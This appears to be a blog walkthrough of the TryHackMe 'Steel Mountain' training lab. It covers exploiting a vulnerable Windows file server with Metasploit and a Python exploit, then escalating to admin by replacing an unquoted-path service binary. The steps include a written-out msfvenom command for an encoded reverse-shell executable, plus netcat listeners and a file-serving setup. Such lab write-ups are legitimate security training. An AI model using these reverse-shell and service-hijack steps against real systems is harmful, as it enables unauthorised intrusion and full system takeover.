TryHackMe - Steel Mountain

For this challenge, we are going to hack a Windows machine and get the flags for user and root. Let’s go!

Challenge: https://www.tryhackme.com/room/steelmountain

[Task 1] Introduction

We need to see what ports are opened and what services are running on the machine where we want to get access. The scan with nmap gave me the following results:

NMAP Scan
NMAP Scan

The first thing we can see is that we have a web server running on port 80.

Who is the employee of the month?

I had a look at the home page, there is a photo with the employee of the month but no name. I checked also the source code and I saw the name of the picture from the home page, it contains the name I was looking for.

Employee Of The Month
Employee Of The Month

Another way of achieving the answer for this question is to do a reverse image search on Google. On the main web page, just right-click on the photo and then click on “Search Google for image”.

[Task 2] Initial Access

Scan the machine with nmap. What is the other port running a web server on?

I have already performed the scan and the answer of this question is available on the first screenshot (I masked it because it is still an answer to one of the questions).

Take a look at the other web server. What file server is running?

Running File Server
Running File Server

When I accessed the other web server, it brought me to the page above. If you click on the link underlined in red from the “Server Information” section, you will find out what is the answer for this question.

What is the CVE number to exploit this file server?

After getting the answer for the previous question, I searched for available vulnerabilities, based on the service name and version.

CVE Exploit Number
CVE Exploit Number

The exploit we are looking for is the one for 2.3.x version, there are 2 available exploits, the CVE is the same for both.

Use Metasploit to get an initial shell. What is the user flag?

After starting Metasploit, I used the name of the file server (the answer of question 2 from Task 2) to find the exploit and, after finding it, I set it as active. The options for this module are visible in the below screenshot.

Metasploit Module
Metasploit Module

The options I set are RHOSTS (the IP of the victim), RPORT (the port on which this service is running - Task 2, question 1) and LHOST (for this one, you should set the IP you got from TryHackMe after connection to their VPN or the IP of the virtual machine you are using directly from them). You can set also LPORT if you want a different one, I decided to leave it like that.

After I set all these options, I just ran “exploit” command and it provided me a meterpreter shell.

Options + Exploit
Options + Exploit

After getting the meterpreter, I typed “shell” in order to get a standard shell on the victim’s machine. Then I went in the home folder and searched for a file called “user.txt” (usually that’s the user flag). I found it on Desktop and then read it and got the flag.

User Flag
User Flag

[Task 3] Privilege Escalation

In the challenge description, at Task 3, there is a link for a Powershell script, named PowerUp.ps1, I downloaded that. After this, I uploaded it on the target system. Following the instructions provided on how to load and start Powershell, I was able to run the script.

Load Powershell
Load Powershell

Take close attention to the CanRestart option that is set to true. What is the name of the name of the service which shows up as an unquoted service path vulnerability?

After running the Invoke-AllChecks, there was a list of services. I looked for the one which had true as value for the option CanRestart and there was a service having this.

Service Name
Service Name

What is the root flag?

The next step I did was to create the reverse shell payload with msfvenom, as mentioned in the challenge. The 3 options needed here are the attacker’s IP, attacker’s port to listen and the name of the payload. The command for this is:

msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker's IP> LPORT=<Attacker's Port> -e x86/shikata_ga_nai -f exe -o <Payload_Name>.exe
Create Reverse Shell Payload
Create Reverse Shell Payload

After this was done, I started nc to listen on the port I set previously, in order to get the admin shell after the payload was executed.

Then, I uploaded the payload, stopped the vulnerable service (Task 3, question 1), replaced the original executable with the file we just copied and started the service.

Service Restarted
Service Restarted

Immediately after this, I got an admin shell. The only thing left to do was to read the root flag.

Root Flag
Root Flag

[Task 4] Access and Escalation Without Metasploit

User Flag

In order to get this without Metasploit we will use an exploit based on a Python script (remember that there were 2 available exploits when we searched for the CVE code).

This exploit is based on uploading a netcat binary and then getting the reverse shell. You need to modify the IP and the port with the IP you got from TryHackMe and the port you want to listen on. Also, you have to download the binaries from the links provided. After you did all this, you must put the Python script, the netcat binary and winPEAS in the same directory.

The steps to follow are:

1. Start a Python HTTP Server in order to be able to upload the netcat binary

Start Python HTTP Server
Start Python HTTP Server

2. Start a nc listener on the port you chose in the exploit script (here I also have the user flag since it is the window where I got the reverse shell)

User Flag
User Flag

3. Run the exploit script twice, first time to upload the payload and the second time to obtain the reverse shell

Run Exploit
Run Exploit

What powershell -c command could we run to manually find out the service name?

After a quick documentation about Powershell commands, I found that the answer was:

powershell -c "Get-Service"

Root Flag

I somehow lost the connection to the machine and I had to restart it. Anyway, after getting the user flag, I uploaded winPEAS.exe file, using powershell.

Upload winPEAS.exe
Upload winPEAS.exe

After I uploaded winPEAS.exe , I ran it and found the exploitable service in the “Services Information” section of the script report.

WinPEAS Services Information
WinPEAS Services Information

The next step is to create the payload with msfvenom and upload it. I used the one created for the first part of this challenge and delivered it on the victim’s machine. Once I uploaded it, I also started a nc listener in order to get the admin shell once the service is restarted.

Payload Upload + Restart Service
Payload Upload + Restart Service

After I restarted the service, I obtained the admin shell and I captured the root flag.

Root Flag
Root Flag

I hope you enjoyed this walkthough!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store